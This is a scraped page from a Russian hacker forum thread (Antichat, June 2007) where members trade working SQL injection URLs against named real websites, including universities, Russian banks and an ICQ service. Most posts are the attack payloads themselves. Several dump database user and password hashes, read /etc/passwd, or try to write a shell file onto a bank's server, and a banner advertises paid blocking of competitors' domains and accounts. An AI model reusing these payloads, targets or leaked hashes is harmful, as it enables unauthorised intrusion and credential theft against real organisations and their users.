Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 245 из 1242

245

Опции темы

Поиск в этой теме

Опции просмотра

#2441

09.06.2007, 01:32

Cond

Новичок

Регистрация: 28.05.2007

Сообщений: 13

Провел на форуме:
17665

Репутация: 23

Какие же там таблицы

Код:

http://www.law.gmu.edu/academics/course_detail.php?num=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9/*

Здесь даже версию не узнать

Код:

http://www.georgiasouthern.edu/askgus/viewanswer.php?q=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*

Код:

http://www.georgiasouthern.edu/askgus/searchbyaud.php?a=-1+union+select+1,2/*

#2442

09.06.2007, 02:41

Isis

Флудер

Регистрация: 20.11.2006

Сообщений: 3,316

Провел на форуме:
16641028

Репутация: 2371

www.uzgeolcom.uz

Код:

http://www.uzgeolcom.uz/news.php?lng=rus&oper=list&id=-1+union+select+1,2,3,4,5,concat_ws(0x3b,version(),database(),user())/*

www.roger.ru
[code]http://www.roger.ru/news/?nid=-1+union+select+1,concat_ws(0x3b,name,email,date),3 ,4,5+from+guest_book/*/code]

Код:

http://www.roger.ru/news/?nid=-1+union+select+1,cocat_ws(0x3b),version(),user(),database())+from+guest_book/*

Последний раз редактировалось Isis; 09.06.2007 в 02:51..

#2443

09.06.2007, 02:44

Isis

Флудер

Регистрация: 20.11.2006

Сообщений: 3,316

Провел на форуме:
16641028

Репутация: 2371

Цитата:

Сообщение от Cond

Какие же там таблицы

Код:

http://www.law.gmu.edu/academics/course_detail.php?num=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9/*

Здесь даже версию не узнать

Код:

http://www.georgiasouthern.edu/askgus/viewanswer.php?q=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*

Код:

http://www.georgiasouthern.edu/askgus/searchbyaud.php?a=-1+union+select+1,2/*

Все узнаваемо

Код:

http://www.georgiasouthern.edu/askgus/viewanswer.php?q=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3b,user(),database(),version()),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14/*

#2444

09.06.2007, 08:28

kair

Участник форума

Регистрация: 12.10.2006

Сообщений: 158

Провел на форуме:
668286

Репутация: 187

Отправить сообщение для kair с помощью ICQ

ЫЫЫ еще sql inj

Цитата:

http://earthdata.com/newsarticle.php?id=430%20union%20select%201,AES_DE CRYPT(AES_ENCRYPT(user,0x78),0x78),AES_DECRYPT(AES _ENCRYPT(password,0x78),0x78),4,5,6%20from%20mysql .user

Цитата:

http://www.eatmybrains.com/showfeature.php?id=430%20union%20select%201,2,3,na me,5,6,7,8,9,10,11,12,13,14,15,16%20from%20user/*

Последний раз редактировалось kair; 09.06.2007 в 09:13..

#2445

09.06.2007, 09:43

KPOT_f!nd

Познавший АНТИЧАТ

Регистрация: 25.08.2006

Сообщений: 1,524

Провел на форуме:
3405508

Репутация: 1745

Код:

http://www.undime.org.br/htdocs/index.php?id=-3557'+union+select+1,2,user(),4,version(),6,7,8,9,10,11,12,13,14,database(),16,17,18,19,20,21,22/*

Код:

http://www.pontoflash.com.br/colunas/materia.php?Item=-186+union+select+1,table_name,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,7+from+information_schema.tables/*

Код:

http://catalog.weblink.org.ua/select.php?f_id=-2+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())/*

#2446

09.06.2007, 10:19

l1ght

Reservists Of Antichat - Level 6

Регистрация: 05.12.2006

Сообщений: 195

Провел на форуме:
14023893

Репутация: 2163

НБР - Национальный банк развития:

Код:

http://www.nbd.ru/ns/about/news/?id=-1+union+select+1,2,3,4,5,6,7,8,9,load_file('/etc/passwd'),11,12,13/*

Национальный банк ТРАСТ: кредит наличными, вклады, кредиты малому бизенсу, etc:

Код:

http://www.trust.ru/ru/about/careers/moscow/printable.php?from4=4&id4=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11/*

Национальный Банк Развития Бизнеса - КБ «НацБизнесБанк» (OOO):

Код:

http://www.nbbank.ru/cnews/print.php?id=2'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

Рассмотрим поподробнее 1ин из них,
trust.ru
Рут:

Код:

http://www.trust.ru/ru/about/careers/moscow/printable.php?from4=4&id4=-1'+union+select+1,2,3,4,5,6,7,8,9,concat(user,0x3d,password),11+from+mysql.user/*

root:3c0f07ef742aa92a
trusrtbank-www:3c0f07ef742aa92a

Читаем файлы:

Код:

http://www.trust.ru/ru/about/careers/moscow/printable.php?from4=4&id4=-1'+union+select+1,2,3,4,5,6,7,8,9,load_file('/etc/passwd'),11/*

Пробуем залить шелл:

Код:

http://www.trust.ru/ru/about/careers/moscow/printable.php?from4=4&id4=-1'+union+select+null,null,null,null,null,null,null,null,null,'test',null+from+mysql.user+into+outfile+'/tmp/rest9999.php'/*

Записалось ли?:

Код:

http://www.trust.ru/ru/about/careers/moscow/printable.php?from4=4&id4=-1'+union+select+1,2,3,4,5,6,7,8,9,load_file('/tmp/rest99.php'),11/*

\N \N \N \N \N \N \N \N \N test \N

__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..

#2447

09.06.2007, 11:02

KPOT_f!nd

Познавший АНТИЧАТ

Регистрация: 25.08.2006

Сообщений: 1,524

Провел на форуме:
3405508

Репутация: 1745

Код:

http://forums.tjat.com/wap/wapmisc.php?action=profile&u=-99%22%20union%20select%201,2,user,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,password,39,40,41,42,43,44,45,46,47+from+mysql.user/*

root:4527fb015ba5ce7d

Код:

http://forums.tjat.com/wap/wapmisc.php?action=profile&u=-99%22%20union%20select%201,2,username,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,concat(user_email,char(58),user_password),39,40,41,42,43,44,45,46,47+from+phpbb_users+limit+1,1/*

лимит в помощь

ran:b45dc32e2201a8c4a39ea72cc1ad2cff
Tjat.comTeam:9e592dbd5de6ec2fbcd1aef248202055
dima:9e592dbd5de6ec2fbcd1aef248202055

ICQ сервис www.tjat.com/wap.tjat.com

сенкс M4g (c)

#2448

09.06.2007, 11:41

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

Отправить сообщение для n1†R0x с помощью ICQ

plaza-j.ru

Код:

http://www.plaza-j.ru/catalog.php?id=2&rid=-1+union+select+1,concat(username,0x3a,passwd),3,4+from+user/*

plaza-j:10054b213fec9d81

#2449

09.06.2007, 11:41

KPOT_f!nd

Познавший АНТИЧАТ

Регистрация: 25.08.2006

Сообщений: 1,524

Провел на форуме:
3405508

Репутация: 1745

Цитата:

Сообщение от C!klodoL

vcam.ru

Код:

http://vcam.ru/index.php?id=-1+union+select+user()/*

там есть таблица orders

Код:

http://vcam.ru/index.php?id=-1+union+select+concat(user(),0x3a,version(),0x3a,database())+from+orders/*

Последний раз редактировалось KPOT_f!nd; 09.06.2007 в 11:46..

#2450

09.06.2007, 12:19

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

dmbasis.ru

Код:

http://www.dmbasis.ru/main.php?id=-1+union+select+1,2,concat(email,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users+limit+0,1/*

вывод в title, пароли в открытом виде, форма логина тоже есть.. ток ничего не дает =)

Страница 245 из 1242

245

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход